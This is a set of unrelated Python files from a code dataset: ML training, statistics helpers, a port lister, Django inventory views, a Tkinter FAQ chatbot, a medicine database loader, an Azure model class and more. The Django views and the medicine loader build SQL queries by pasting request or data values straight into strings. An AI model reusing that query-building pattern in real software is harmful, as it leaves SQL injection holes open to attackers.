saved_estimator_path = model.export_savedmodel('saved_model', receiver_fn).decode(\"utf-8\")\n print('model is saved to [%s]' % saved_estimator_path)\n\n model_info = {}\n model_info['acc'] = acc\n model_info['save_path'] = os.path.join(config.project_root, saved_estimator_path)\n model_info['loss'] = loss\n return model_info\n\nif __name__ == \"__main__\":\n train(\"D:/darkd/cifar10_train.csv\")\n if len(sys.argv) <= 1:\n print('lack of arguments!')\n exit(-1)\n\n if sys.argv[1] == 'train':\n train()\n elif sys.argv[1] == 'predict':\n (x_train, y_train), (x_test, y_test) = datasets.load_cifar10()\n predict(sys.argv[2], x_test)\n\n","sub_path":"server/model/cnn_cifar.py","file_name":"cnn_cifar.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"459152061","text":"from scipy.special import erf\nfrom math import sqrt\nfrom math import exp\nfrom math import pi\nfrom random import gauss\n\n\ndef mutual_path(l1, l2):\n '''take two lists of vertices diffusion goes through and return mutual\n path between the two as a set of edges'''\n edges1 = set(tuple(sorted(e)) for e in zip(l1, l1[1:]))\n edges2 = set(tuple(sorted(e)) for e in zip(l2, l2[1:]))\n return edges1 & edges2\n\n\ndef gauss_cdf(x):\n return 0.5 * (1 + erf(x / sqrt(2)))\n\n\ndef standard_normal(x):\n return exp(-0.5 * (x**2)) / sqrt(2 * pi)\n\n\ndef mean_of_min(mu1, mu2, sigma1, sigma2, ro=0):\n th = sqrt(sigma1**2 + sigma2**2 - 2 * ro * sigma1 * sigma2)\n f1 = gauss_cdf((mu2 - mu1) / th)\n f2 = gauss_cdf((mu1 - mu2) / th)\n f3 = standard_normal((mu2 - mu1) / th)\n return mu1 * f1 + mu2 * f2 - th * f3\n\n\ndef var_of_min(mu1, mu2, sigma1, sigma2, ro=0):\n '''ex is mean_of_min(mu1,mu2)'''\n th = sqrt(sigma1**2 + sigma2**2 - 2 * ro * sigma1 * sigma2)\n f1 = gauss_cdf((mu2 - mu1) / th)\n f2 = gauss_cdf((mu1 - mu2) / th)\n f3 = standard_normal((mu2 - mu1) / th)\n ex2 = ((sigma1**2 + mu1**2) * f1 + (sigma2**2 + mu2**2) * f2 -\n (mu1 + mu2) * th * f3)\n return ex2 - (mean_of_min(mu1, mu2, sigma1, sigma2, ro))**2\n\n\ndef mean_of_multiple_shortest(paths, mu, sigma):\n '''assumes the same mean and var on each edge'''\n path_length = len(paths[0]) - 1\n no_paths = len(paths)\n if no_paths > 1:\n outm = mean_of_min(mu * path_length, mu * path_length,\n sigma * sqrt(path_length),\n sigma * sqrt(path_length))\n else:\n outm = path_length * mu\n return outm\n\n\ndef var_of_multiple_shortest(paths, mu, sigma):\n '''assumes the same mean and var on each edge'''\n path_length = len(paths[0]) - 1\n no_paths = len(paths)\n if no_paths > 1:\n outv = var_of_min(mu * path_length, mu * path_length,\n sigma * sqrt(path_length),\n sigma * sqrt(path_length))\n else:\n outv = path_length * (sigma**2)\n return outv\n\n\ndef gauss_without_negative(m, s):\n x = gauss(m, s)\n if x < 0:\n x = 0\n return x\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"lsd/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"538453961","text":"#!/usr/bin/env python3\n\n\"\"\"Optional Tasks:\n---------------\n\nSimple:\n\n* Write a python function that lists the services provided by a given range of\n ports.\n\n * accept the lower and upper bounds as arguments\n * provide sensible defaults\n * Ensure that it only accepts valid port numbers (0-65535)\n\n 21: File Transfer Protocol (FTP)\n 22: Secure Shell (SSH)\n 23: Telnet remote login service\n 25: Simple Mail Transfer Protocol (SMTP)\n 53: Domain Name System (DNS) service\n 80: Hypertext Transfer Protocol (HTTP) used in the World Wide Web\n 110: Post Office Protocol (POP3)\n 119: Network News Transfer Protocol (NNTP)\n 123: Network Time Protocol (NTP)\n 143: Internet Message Access Protocol (IMAP)\n 161: Simple Network Management Protocol (SNMP)\n 194: Internet Relay Chat (IRC)\n 443: HTTP Secure (HTTPS)\n\n\"\"\"\n\nimport socket\n\ndef port_report(lower = 21, upper = 80):\n for port in range(lower, upper):\n try:\n serv = socket.getservbyport(port)\n except:\n continue\n print(\"Port: {}\\t{}\".format(port, serv))\n\nif __name__ == '__main__':\n port_report()","sub_path":"port_report.py","file_name":"port_report.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348626243","text":"# -*- coding:utf-8 -*-\n__author__ = ''\n__date__ = '2017/3/21 14:57'\n\nimport datetime, json\nfrom django.core.paginator import Paginator # 分页查询\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom sellcard.common import Method as mth\nfrom sellcard.common.model import MyError\nfrom sellcard.models import CashierList, Shops, CardInventory\n\n\ndef index(request):\n shop = request.session.get('s_shopcode')\n role = request.session.get('s_roleid')\n shops = Shops.objects.values('shop_code','shop_name','city').order_by('shop_code')\n if role in ('1','6','7') :\n shops = shops\n elif role == '8':#承德总部财务\n shops = shops.filter(city='C')\n elif role == '9':#唐山总部财务\n shops = shops.filter(city='T')\n else:\n shops = shops.filter(shop_code=shop)\n shops_len = len(shops)\n if request.method == 'POST':\n shopcode = mth.getReqVal(request, 'shopcode', '')\n keyword = mth.getReqVal(request, 'keyword', '')\n # 表单分页参数开始\n page = mth.getReqVal(request, 'page', 1)\n show_num = mth.getReqVal(request, 'show_num', 8)\n # 表单分页参数结束\n\n conn = mth.getMysqlConn()\n cur = conn.cursor()\n whereStr = \"WHERE t.is_store = 1 \"\n\n if role in ('2', '10'):\n whereStr += \" AND t.shop_code ='\" + shop + \"'\"\n\n\n if shopcode != '':\n whereStr += \" AND t.shop_code ='\" + shopcode + \"'\"\n else:\n shopsCode = ''\n if role == '9':\n shopsCode = mth.getCityShopsCode('T')\n shopsCodeStr = \"'\" + \"','\".join(shopsCode) + \"'\"\n whereStr += \" AND t.shop_code IN (\" + shopsCodeStr + \")\"\n if role == '8':\n shopsCode = mth.getCityShopsCode('C')\n shopsCodeStr = \"'\" + \"','\".join(shopsCode) + \"'\"\n whereStr += \" AND t.shop_code IN (\" + shopsCodeStr + \")\"\n\n if keyword != '':\n whereStr += \" AND (c.username like '%\" + keyword + \"%' OR c.`name` like '%\" + keyword + \"%')\"\n\n sql = \"\"\"\nSELECT\n\tt.shop_code,\n\ts.shop_name,\n\tc.username as user_code,\n\tIFNULL(c.`name`, '未分配') AS username,\n\tt.card_value,\n\tcount(t.card_no) AS account,\n\tsum(CASE WHEN t.card_status = 2 THEN 1 ELSE 0 END) AS out_num,\n\tsum(CASE WHEN t.card_status = 1 THEN 1 ELSE 0 END) AS in_num\nFROM\n\tcard_inventory t LEFT JOIN shops s ON t.shop_code = s.shop_code\n\tLEFT JOIN cashier_list c ON t.shop_code = c.shop_code and t.username = c.username\n\"\"\"+ whereStr +\"\"\"\nGROUP BY\n\tt.shop_code,\n\ts.shop_name,\n\tc.username,\n\tc.`name`,\n\tt.card_value\n \"\"\"\n cur.execute(sql)\n List = cur.fetchall()\n\n # 表单分页开始\n paginator = Paginator(List, show_num)\n\n try:\n List = paginator.page(page)\n\n if List.number > 1:\n page_up = List.previous_page_number\n else:\n page_up = 1\n\n if List.number < List.paginator.num_pages:\n page_down = List.next_page_number\n else:\n page_down = List.paginator.num_pages\n\n except Exception as e:\n print(e)\n # 表单分页结束\n\n return render(request, 'consign/list.html', locals())\n\n\ndef detail(request):\n # 在服务端session中添加key认证,避免用户重复提交表单i\n token = 'allow' # 可以采用随机数\n request.session['postToken'] = token\n shop_code = request.session.get('s_shopcode')\n userList= CashierList.objects.values('username', 'name').filter(shop_code=shop_code)\n return render(request, 'consign/detail.html', locals())\n\n\n@transaction.atomic\ndef save(request):\n res = {}\n if request.method == 'POST':\n # 检测session中Token值,判断用户提交动作是否合法\n Token = request.session.get('postToken', default=None)\n # 获取用户表单提交的Token值\n userToken = request.POST.get('postToken', '')\n if userToken != Token:\n res[\"msg\"] = 0\n return HttpResponse(json.dumps(res))\n\n shop_code = request.session.get('s_shopcode')\n name = request.POST.get('name')\n start_no = request.POST.get('start_no')\n end_no = request.POST.get('end_no')\n try:\n with transaction.atomic():\n conn = mth.getMysqlConn()\n cur = conn.cursor()\n sql = \" update card_inventory set username='{name}'\" \\\n \" where is_store=1 and shop_code='{shop}' and username=''\" \\\n \" and card_no >= {start} AND card_no <= {end}\"\\\n .format(start=start_no,end=end_no,name=name,shop=shop_code)\n cur.execute(sql)\n res['msg'] = 1\n del request.session['postToken']\n\n except Exception as e:\n print(e)\n res['msg'] = 0\n\n return HttpResponse(json.dumps(res))\n\n","sub_path":"sellcard/fornt/consign/allocate.py","file_name":"allocate.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29800546","text":"from tkinter import *\r\nroot=Tk()\r\n\r\ndef chatbot():\r\n send=e.get(\"1.0\",'end-1c').strip()\r\n e.delete(\"0.0\",END)\r\n\r\n if send != '':\r\n \r\n txt.config(state=NORMAL)\r\n txt.insert(END, \"You: \" + send + '\\n')\r\n txt.config(foreground=\"white\", font=(\"Verdana\", 8 ))\r\n \r\n \r\n j=send.split()\r\n k=len(j)\r\n #print(j)\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"hi\" or j[l]==\"hello\" or j[l]==\"hey\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Hello!, I am here to solve your examination quaries.\\n\\n\")\r\n \r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\" ):\r\n for m in range(0,k):\r\n if(j[m]==\"conducted\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Exams are conducted by lpu examination department.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"date\"or j[m]==\"dates\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are from 29-04-2020 to 13-05-2020.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exams\"):\r\n for m in range(0,k):\r\n if(j[m]==\"from\" or j[m]==\"starting from\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are from 29-04-2020.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"examination \" or j[l]==\"exams\"):\r\n for m in range(0,k):\r\n if(j[m]==\"till\" or j[m]==\"ending\" or j[m]==\"end\" or j[m]==\"ends\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are from 13-05-2020.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\"):\r\n for m in range(0,k):\r\n if(j[m]==\"instructions\"):\r\n txt.insert(END,\"\\n\"+\"BOT:You can find examination instruction in UMS \\n Follow the path UMS navigation -> Examination -> Examination Queries.\\n\\n\")\r\n \r\n\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination instructions\" or j[l]==\"instructions\"):\r\n for n in range(0,k):\r\n if(j[n]==\"for\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:You can find examination instruction in UMS \\n Follow the path UMS navigation -> Examination -> Examination Queries.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"seating\"):\r\n for m in range(0,k):\r\n if(j[m]==\"plan\" or j[m]==\"arrangement\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It will be available in your alloted examination class.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"timings\" or j[m]==\"classroom\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It will be uploaded on ums->seating arrangements or it will be available on lpu touch exams available.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"pattern\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It is based on the course.you can available it in the UMS.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"grades\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Grades are given by subject wise.where grade O to D are passed and E grade is reapper,F is fail.you have 5 chances to clear your reappers.\\n\\n\")\r\n\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"doubts\" or j[l]==\"discrepency\"):\r\n for n in range(0,k):\r\n if(j[n]==\"in\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:There was a discrepancy form with invigilator there you need to fill your doubts in the question paper.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"eligible\"):\r\n for n in range(0,k):\r\n if(j[n]==\"for\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Students whose attendence is above 75% are eligible for examination.\\n\\n\")\r\n\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"contact\"):\r\n for m in range(0,k):\r\n if(j[m]==\"details\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Here is our contact numbers:\\n9986523741\\n7894561235.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"bye\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Hope your queries are cleared and if you any further doubts you can visit block no:30 \\n All the best for your exams from LPU chatbot.\\n\\n\")\r\n\r\n\r\n \r\n \r\n\r\n\r\ntxt=Text(root)\r\ntxt.grid(row=0,column=0,columnspan=2)\r\nroot.geometry(\"400x500\")\r\nroot.resizable(width=FALSE, height=FALSE)\r\n\r\ne=Text(root, bd=0, bg=\"white\",width=\"29\", height=\"5\", font=\"Arial\")\r\nSendButton = Button(root, font=(\"Verdana\",12,'bold'), text=\"Send\", width=\"12\", height=5,\r\n bd=0, bg=\"#32de97\", activebackground=\"#3c9d9b\",fg='#ffffff',\r\n command=chatbot)\r\n\r\nroot.title(\"LPU EXAMINATION QUERIES\")\r\n\r\n\r\ntxt = Text(root, bd=0, bg=\"black\", height=\"8\", width=\"50\", font=\"Arial\",)\r\ntxt.config(state=DISABLED)\r\n\r\nscrollbar = Scrollbar(root, command=txt.yview, cursor=\"heart\")\r\ntxt['yscrollcommand'] = scrollbar.set\r\n\r\nscrollbar.place(x=376,y=6, height=386)\r\ntxt.place(x=6,y=6, height=386, width=370)\r\ne.place(x=144, y=401, height=90, width=265)\r\nSendButton.place(x=6, y=401, height=90)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409496498","text":" # MATCHING 0 OR MORE WITH STARS\nimport re\n\ni = re.compile(r'bat(wo)*man')\nI = i.search('i saw batman')\nIi = i.search('i saw batwoman')\nII = i.search('i saw batwowowowowowowowoman')\n\nprint(I.group(),Ii.group(),II.group())\n\n''' \nthe star mean that if something match then print it and if the word which is in the parentheses is repeaded multiple times then it will print that as well \n\n'''\n\n\n","sub_path":"pattern matching and with regular expression/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282478123","text":"import json\n\nfrom databasehelper import DatabaseConnection\nfrom settings import SETTINGS\n\n\nclass Medicine():\n def __init__(self, json_data):\n self.json_data = json_data\n\n self.__name = ''\n self.__concentrate = ''\n self.__package = ''\n self.__form = ''\n self.__producer = ''\n self.__producer_country = ''\n self.__price = 0.0\n\n @property\n def name(self):\n self.__name = self.json_data['den_produs']\n return self.__name\n\n @property\n def concentrate(self):\n self.__concentrate = self.json_data['concentr']\n return self.__concentrate\n\n @property\n def package(self):\n self.__package = self.json_data['ambalaj']\n return self.__package\n\n @property\n def form(self):\n self.__form = self.json_data['forma']\n return self.__form\n\n @property\n def producer(self):\n prod = self.json_data['firma'].split(' - ')\n if len(prod) == 2:\n self.__producer = prod[0]\n else:\n self.__producer = prod[0] + ' - ' + prod[1]\n return self.__producer\n\n @property\n def producer_country(self):\n prod = self.json_data['firma'].split(' - ')\n self.__producer_country = prod[len(prod)-1]\n return self.__producer_country\n\n @property\n def price(self):\n self.__price = self.json_data['pret_prod']\n return self.__price\n\n\nclass MedicineComposition():\n def __init__(self):\n pass\n\n def add_new(self, db, con, d, medicine_id):\n comp_id_if_exists = db.select_id(con, \"SELECT id FROM composition WHERE name='%s';\" % d)\n print('COMP_IF_EXISTS', comp_id_if_exists)\n if comp_id_if_exists == 0:\n query_one = \"INSERT INTO composition (name) VALUES ('%s');\" % d\n print(\"INSERT IN COMPOSITION:\", query_one)\n db.execute_query(con, query_one)\n composition_id = db.count_all(con, \"SELECT * FROM composition;\")\n print(composition_id, medicine_id)\n query_two = \"INSERT INTO medicine_composition (medicine_id, composition_id) VALUES (%d, %d)\" % (\n medicine_id, composition_id)\n print(\"INSERT IN MED_COMP:\", query_two)\n db.execute_query(con, query_two)\n else:\n query_two = \"INSERT INTO medicine_composition (medicine_id, composition_id) VALUES (%d, %d)\" % (\n medicine_id, comp_id_if_exists)\n print(\"INSERT IN MED_COMP: \", query_two)\n db.execute_query(con, query_two)\n\n\nif __name__ == \"__main__\":\n db = DatabaseConnection(SETTINGS.DATABASE_NAME, SETTINGS.DATABASE_USERNAME, SETTINGS.DATABASE_PASSWORD)\n con = db.connection\n\n db.reset_tables(con, \"faw_create_medicine_composition.sql\")\n\n json_file = open(SETTINGS.JSON_PATH + '_medicine_list.json', 'r')\n json_data = json.load(json_file)\n\n for i in range(0, len(json_data)):\n data = json_data[i]\n\n # medicine\n medicine = Medicine(data)\n query = \"INSERT INTO medicine (name, concentrate, package, form, producer, producer_country, price) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', %.2f);\" %(\n medicine.name, medicine.concentrate, medicine.package, medicine.form,\n medicine.producer, medicine.producer_country, medicine.price)\n print(\"INSERT IN MEDICINE:\", query)\n db.execute_query(con, query)\n\n # composition\n dci = data['dci']\n mc = MedicineComposition()\n\n medicine_id = db.count_all(con, \"SELECT * FROM medicine;\")\n if dci.find(' + ') != -1:\n dci_list = dci.split(' + ')\n for d in dci_list:\n mc.add_new(db, con, d, medicine_id)\n else:\n mc.add_new(db, con, dci, medicine_id)\n","sub_path":"database/py_scripts/medicine.py","file_name":"medicine.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386530821","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ManagementLockObject(Model):\n \"\"\"The lock information.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :param level: The level of the lock. Possible values are: NotSpecified,\n CanNotDelete, ReadOnly. CanNotDelete means authorized users are able to\n read and modify the resources, but not delete. ReadOnly means authorized\n users can only read from a resource, but they can't modify or delete it.\n Possible values include: 'NotSpecified', 'CanNotDelete', 'ReadOnly'\n :type level: str or\n ~azure.mgmt.resource.locks.v2016_09_01.models.LockLevel\n :param notes: Notes about the lock. Maximum of 512 characters.\n :type notes: str\n :param owners: The owners of the lock.\n :type owners:\n list[~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockOwner]\n :ivar id: The resource ID of the lock.\n :vartype id: str\n :ivar type: The resource type of the lock - Microsoft.Authorization/locks.\n :vartype type: str\n :param name: The name of the lock.\n :type name: str\n \"\"\"\n\n _validation = {\n 'level': {'required': True},\n 'id': {'readonly': True},\n 'type': {'readonly': True},\n }\n\n _attribute_map = {\n 'level': {'key': 'properties.level', 'type': 'str'},\n 'notes': {'key': 'properties.notes', 'type': 'str'},\n 'owners': {'key': 'properties.owners', 'type': '[ManagementLockOwner]'},\n 'id': {'key': 'id', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n }\n\n def __init__(self, level, notes=None, owners=None, name=None):\n super(ManagementLockObject, self).__init__()\n self.level = level\n self.notes = notes\n self.owners = owners\n self.id = None\n self.type = None\n self.name = name\n","sub_path":"azure-mgmt-resource/azure/mgmt/resource/locks/v2016_09_01/models/management_lock_object.py","file_name":"management_lock_object.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359710667","text":"import sjuman2_spate505 as part1\nimport os,sys\nfrom nltk.parse import CoreNLPParser,CoreNLPDependencyParser\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom sqlite3 import Error\nimport query_movies\nimport music_geog\n\ndef return_deptree(qstn,parser):\n\tparse = next(parser.raw_parse(qstn))\n\treturn parse\n\n\nif __name__=='__main__':\n\tfilename=\"\"\n\twhile True:\n\t\tpathname = os.path.dirname(sys.argv[0])\n\t\tif len(sys.argv)==2:\n\t\t\tfilename=sys.argv[1]\n\t\t\tif os.path.isfile(os.path.join(pathname,filename)):\n\t\t\t\tfilename=os.path.join(pathname,filename)\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"File name not provided or file does not exist, please enter the filename:\")\n\t\t\tfilename=input().strip()\n\t\t\tif os.path.isfile(os.path.join(pathname,filename)):\n\t\t\t\tfilename=os.path.join(pathname,filename)\n\t\t\t\tbreak\n\tgeog=['place','continent','region','mountain','ocean','river','country','capital','forest','desert','locate','border','city','state','valley','sea','hill','geography','waterfall','volcano']\n\tmovies_list =['actor','actress','movie','direct','film','oscar','star','theatre','play','plot','drama','shoot','cinema','act']\n\tmusic_list = ['sing','record','album','song','artist','rap','track','record','music','compose','rock','pop','dance','singer','blues','indie']\n \n\t#Setting up music category\n\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\tif not(conn is None):\n\t\tmus_name,songs=part1.music(conn)\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"SELECT name FROM album\")\n\t\trows = cur.fetchall()\n\t\talbums=set()\n\t\tfor row in rows:\n\t\t\tr=str(rows[0]).lower().split(\" \")\n\t\t\talbums.add(r[0])\n\t\t\talbums.add(r[1])\n\t\tcur.execute(\"SELECT name FROM track\")\n\t\trows = cur.fetchall()\n\t\ttracks=set()\n\t\tfor row in rows:\n\t\t\tr=str(rows[0]).lower().split(\" \")\n\t\t\ttracks.add(r[0])\n\t\t\ttracks.add(r[1])\n\t\t\ttracks.add(r[2])\n\n\t#Setting up geography category\n\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\tif not(conn is None):\n\t\tgeog_db=part1.geography_db(conn)\n\n\n\t\t#Getting the set of similar words from wordnet\n\t\tgeog_set=part1.create_lists(geog)\t \n\t\tmov_set=part1.create_lists(movies_list)\n\t\tmusic_set=part1.create_lists(music_list)\n\t\tmov_set.add('schindler')\n#Getting the tags\n\tqstn,ner,pos=part1.tagging(filename)\n\tparser = CoreNLPParser(url='http://localhost:9000')\n\tdep_parser = CoreNLPDependencyParser(url='http://localhost:9000')\n\t# Printing parse tree and output\n\tfor i in range(0,len(qstn)):\n\t\tqtype=\"YesNo\"\n\t\tprint(\"Question: \", qstn[i].strip())\n\t\tparsed=part1.parse_tree(qstn[i],parser)\n\t\tdep_parsed=return_deptree(qstn[i],dep_parser)\n\t\n\t\tif 'SBAR' in parsed[0:15]:\n\t\t\tqtype=\"WH\"\n\t\tcategory=part1.categorize(qstn[i],ner[i],pos[i],geog_set,mov_set,music_set, mus_name,songs,geog_db)\n\t\n\t\tif category==\"Music\":\n\t \n\t\t\tif qtype==\"WH\":\n\t\t\n\t\t\t\tsql_query=music_geog.ans_music_wh(dep_parsed,parsed,ner[i],qstn[i],albums,tracks)\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t \n\t\t\telse:\n\t\t\t\tsql_query=music_geog.ans_music_yesno(dep_parsed,parsed,ner[i],qstn[i],albums,tracks)\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t \n\n\t\telif category==\"Movies\":\n\t\t\tquery=query_movies.generate_query(dep_parsed,ner[i],parsed,mov_set)\n\t\t\tquery_movies.run_query_m(query)\n\t\t\tprint(\"----------------------------------------\")\n\n\t\telse:\n\t\t\tif qtype==\"WH\":\n\t\t\t\tsql_query=music_geog.ans_geog_wh(dep_parsed,parsed,ner[i])\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\n\t\t\telse:\n\t\t\t\tsql_query =music_geog.ans_geog_yesno(qstn[i],dep_parsed,parsed,ner[i])\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\n\t\t\n\n","sub_path":"sjuman2_spate505/part2_new.py","file_name":"part2_new.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"379933395","text":"from sqlalchemy.exc import SQLAlchemyError\nfrom app.index import db\n\n\ndef create(*args, **kwargs):\n \"\"\"\n Return model instance that had been created\n @param args[0] Model class\n @param kwargs Named arguments i.e. something=value\n \"\"\"\n try:\n\n # Checks model class arguments\n if not kwargs:\n new_obj = args[0]()\n else:\n new_obj = args[0](**kwargs)\n \n\n if type(new_obj) is not args[0]:\n raise TypeError(\"new_obj is not of type {}\".format(args[0]))\n db.session.add(new_obj)\n db.session.flush()\n return new_obj\n except (SQLAlchemyError, TypeError):\n db.session.rollback()\n return False","sub_path":"app/utils/model_utils/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"200728034","text":"import pygame\nfrom network import Network\n\npygame.font.init()\nwidth = 700\nheight = 700\nwin = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Client\")\n\n\nclass Button:\n def __init__(self, text, x, y, color):\n self.text = text\n self.x = x\n self.y = y\n self.color = color\n self.width = 150\n self.height = 100\n\n def draw(self, win):\n pygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.height))\n font = pygame.font.SysFont(\"comicsans\", 40)\n text = font.render(self.text, 1, (255, 255, 255))\n win.blit(text, (self.x + round(self.width/2) - round(text.get_width()/2), self.y + round(self.height/2) -\n round(text.get_height()/2)))\n\n def click(self, pos):\n x1 = pos[0]\n y1 = pos[1]\n if self.x <= x1 <= self.x + self.width and self.y <= y1 <= self.y + self.height:\n return True\n else:\n return False\n\n\ndef redraw_window(win, game, p, score):\n win.fill((128, 128, 128))\n\n if not(game.connected()):\n font = pygame.font.SysFont(\"comicsans\", 80)\n text = font.render(\"Waiting for Player...\", 1, (255, 0, 0), True)\n win.blit(text, (width/2 - text.get_width()/2, height/2 - text.get_height()/2))\n else:\n font = pygame.font.SysFont(\"comicsans\", 60)\n 